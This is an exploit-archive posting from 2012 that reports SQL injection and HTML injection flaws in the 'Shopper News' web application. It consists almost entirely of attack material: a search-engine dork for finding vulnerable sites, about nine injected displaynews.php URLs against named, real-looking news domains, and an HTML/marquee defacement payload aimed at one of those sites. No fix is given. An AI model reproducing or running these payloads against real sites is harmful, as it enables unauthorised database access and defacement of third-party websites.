Shopper News (Silver Lake Shopper News) Multiple Vulnerabilities
2012-08-25 11:25:42Posted by: x-cisadane
================================================================
Shopper News (Silver Lake Shopper News) Multiple Vulnerabilities
================================================================
:----------------------------------------------------------------------------------------------------------------------------------------:
: # Exploit Title : Shopper News (Silver Lake Shopper News) Multiple Vulnerabilities
: # Date : 25 August 2012
: # Author : X-Cisadane
: # Contact Link : http://shoppernewsonline.com/ or [email protected]
: # Developed By : Adam More
: # Version : ALL
: # Category : Web Applications
: # Vulnerability : SQL Injection Vulnerability & HTML Injection Vulnerability
: # Tested On : Mozilla Firefox 14.0.1 (Windows)
: # Greetz to : X-Code, Borneo Crew, Depok Cyber, Explore Crew, CodeNesia, Bogor-H, Jakarta Anonymous Club, Winda Utari
:----------------------------------------------------------------------------------------------------------------------------------------:
DORKS
=====
intitle:Highdesert news Home
Proof of Concept
================
SQL Injection : http://victim site/<path>/displaynews.php?id=['SQL]
Example :
http://thedcnews.com/displaynews.php?id='25
http://thesilverlakesnews.com/displaynews.php?id='5088
http://www.thevictorvillenews.com/displaynews.php?id='26
http://www.hidesertnewsonline.com/displaynews.php?id='5125&s=267442
http://theapplevalleynews.com/displaynews.php?id=417'
http://www.thespringvalleylakenews.com/displaynews.php?id='5118&s=291303
http://thehesperianews.com/displaynews.php?id='5
http://thebarstownews.com/displaynews.php?id='5
http://theadelantonews.com/displaynews.php?id='5
HTML Injection : http://victim site/<path>/displaynews.php?id=[number id]>HTML Code Here
Example :
http://theapplevalleynews.com/displaynews.php?id=5065><h1><marquee>XSSed By : X-Cisadane</marquee><br>Greetz To : Winda Utari, Shinta Ambarwaty, etc</h1>
Fixes
No fixesIn order to submit a new fix you need to be registered.